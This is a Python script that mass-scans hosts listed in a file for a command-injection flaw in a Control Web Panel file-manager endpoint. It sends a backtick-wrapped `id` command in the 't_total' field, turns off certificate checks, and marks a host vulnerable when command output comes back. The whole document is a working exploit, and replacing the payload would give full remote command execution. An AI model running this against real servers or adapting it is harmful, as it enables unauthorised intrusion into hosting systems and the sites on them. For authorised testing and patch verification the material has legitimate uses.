import requests
import urllib3

# Disable SSL cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def test_target(target_ip, port, username):
    url = f"https://{target_ip}:{port}/admin/index.php?module=filemanager&acc=changePerm"
    data = {
        'user': username,
        't_total': '`id`'
    }

    try:
        response = requests.post(url, data=data, verify=False, timeout=10)
        if "uid=" in response.text:
            print(f"[!] VULNERABLE: {target_ip}:{port} — Command executed")
        else:
            print(f"[-] Not Vulnerable or Patched: {target_ip}:{port}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error with {target_ip}:{port} — {e}")

def scan_targets(file_path, port, username):
    try:
        with open(file_path, "r") as f:
            targets = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"[X] File not found: {file_path}")
        return

    for target in targets:
        test_target(target, port, username)

if __name__ == "__main__":
    # === CONFIGURATION ===
    target_file = "targets.txt"      # File containing IPs or hostnames
    cwp_port = "2083"                # Change to 2087 for admin panel
    known_user = "testuser"          # Known valid CWP user (not root)

    print(f"[*] Scanning targets in {target_file}...\n")
    scan_targets(target_file, cwp_port, known_user)